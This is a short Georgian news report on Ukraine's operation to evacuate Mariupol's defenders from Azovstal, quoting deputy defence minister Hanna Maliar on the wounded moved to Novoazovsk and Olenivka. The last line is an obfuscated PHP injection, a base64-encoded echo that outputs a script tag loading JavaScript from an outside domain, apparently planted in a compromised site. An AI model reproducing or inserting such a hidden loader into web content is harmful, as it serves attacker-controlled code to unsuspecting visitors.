celsiusi
ავერსი საქკაბელი
უკრაინის თავდაცვის მინისტრის მოადგილის ანა მალიარის განცხადებით, უკრაინამ მარიუპოლის დამცველების გათავისუფლების ოპერაცია დაიწყო. ამის შესახებ უკრაინული მედია „უნიანი“ წერს.
 
მალიარის განცხადებით, 16 მაისს „აზოვსტალიდან“ ნოვოაზოვსკში მდებარე სამედიცინო დაწესებულებაში გადაიყვანეს 53 მძიმედ დაჭრილი სამხედრო. კიდევ 211 ადამიანი ჰუმანიტარული დერეფნით ოლენევკაში ჩაიყვანეს. უკრაინული მხარის ცნობით, მათი სახლებში დასაბრუნებლად, გაცვლის პროცედურა ჩატარდება.
 
მალიარის ცნობით, ამჟამად ტარდება ღონისძიებები „აზოვსტალის“ ტერიტორიაზე დარჩენილი დამცველების გადასარჩენად.
 
„მარიუპოლის დამცველების დახმარებით ჩვენ კრიტიკულად მნიშვნელოვანი დრო მივიღეთ რეზერვების ფორმირებისთვის, ძალების გადაჯგუფებისთვის და პარტნიორებისგან დახმარების მისაღებად. სარდლობის მიერ ყველა დასახული ამოცანა მარიუპოლის დამცველებმა სრულად შეასრულეს“, – განაცხადა ანა მალიარმა.
 
თავდაცვის მინისტრის მოადგილის თქმით, უკრაინას არ აქვს „აზოვსტალის“ სამხედრო გზით განბლოკვის საშუალება. როგორც მან აღნიშნა, მთელი უკრაინის და მთელი მსოფლიოს უმნიშვნელოვანესი ამოცანაა მარიუპოლის დამცველების სიცოცხლის გადარჩენა.
678
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");